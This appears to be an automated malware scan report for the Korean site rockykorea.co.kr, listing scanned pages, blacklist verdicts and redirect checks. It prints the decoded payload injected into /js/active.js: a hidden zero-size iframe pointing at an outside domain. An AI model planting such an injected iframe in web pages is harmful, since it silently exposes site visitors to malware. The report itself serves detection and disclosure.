Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rockykorea.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.rockykorea.co.kr/ | 200 OK Content-Length: 54848 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: m.rocky.co.kr ...[882 bytes skipped]... esheet" type="text/css" media="all"/> <script type="text/javascript" src="/js/active.js"></script> <script type="text/javascript"> var mobileKeyWords = new Array('iPhone', 'iPod', 'BlackBerry', 'Android', 'Windows CE', 'LG', 'MOT', 'SAMSUNG', 'SonyEricsson'); for (var word in mobileKeyWords){ if (navigator.userAgent.match(mobileKeyWords[word]) != null){ top.location = "http://m.rocky.co.kr"; break; } } </script> <script type="text/javascript"> function ebook() { //window.open('/e-Book/catalog_2011/catalog_2011.html','','width=1024,height=768,resizable=yes,scrollbars=no,top=0,left=0'); location.href= "/support/Download.asp?Ls_Filename=catalog_2014.pdf"; } </script> </head> <script language='javascript'> function getCookie( name ) { ...[2599 bytes skipped]... | ||
http://www.rockykorea.co.kr/js/active.js | 200 OK Content-Length: 2162 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.jumprope.co.kr function swf(src,w,h,f_var){ html = ''; html += '<object type="application/x-shockwave-flash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" id="param1" width="'+w+'" height="'+h+'">'; html += '<param name="movie" value="'+src+'">'; html += '<param name="quality" value="high">'; html += '<param n ...[1918 bytes skipped]... Decoded script: <iframe src=http://www.jumprope.co.kr/mail/index.html width=0 height=0></iframe> | ||
http://www.rockykorea.co.kr/membership/login.asp | 200 OK Content-Length: 56818 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/membership/ | 403 Forbidden Content-Length: 223 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/membership/join01.asp | 200 OK Content-Length: 53616 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/sitemap/sitemap.asp | 200 OK Content-Length: 59181 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/sitemap/ | 403 Forbidden Content-Length: 223 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/eng/index.asp | 200 OK Content-Length: 858 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/eng/Download.asp?Ls_Filename=ENG_catalog_2013.pdf | 200 OK Content-Length: 300782 Content-Type: application/octet-stream | clean |
http://www.rockykorea.co.kr/company/profile.asp | 200 OK Content-Length: 54265 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.rocky.co.kr <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ko" xml:lang="ko"> <head> <meta http-equiv="Content-Type" content="text/html; charset=euc-kr" /> <meta name="robots" content="index.follow"/> <meta name="keywords" content="·ÏÅ°, rocky, »ê¾÷¿ë ÀÎÅ׸®¾î °¡±¸, °ø±¸Á¤¸®, Ŭ·¥ÇÁ, È ...[3960 bytes skipped]... | ||
http://www.rockykorea.co.kr/company/ | 403 Forbidden Content-Length: 223 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/company/greeting.asp | 200 OK Content-Length: 53601 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/company/history.asp | 200 OK Content-Length: 56824 Content-Type: text/html | clean |
http://www.rockykorea.co.kr/company/ci.asp | 200 OK Content-Length: 53654 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rockykorea.co.kr
Result:
GET / HTTP/1.1
Host: rockykorea.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: rockykorea.co.kr
Referer: http://www.google.com/search?q=rockykorea.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rockykorea.co.kr
Referer: http://www.google.com/search?q=rockykorea.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.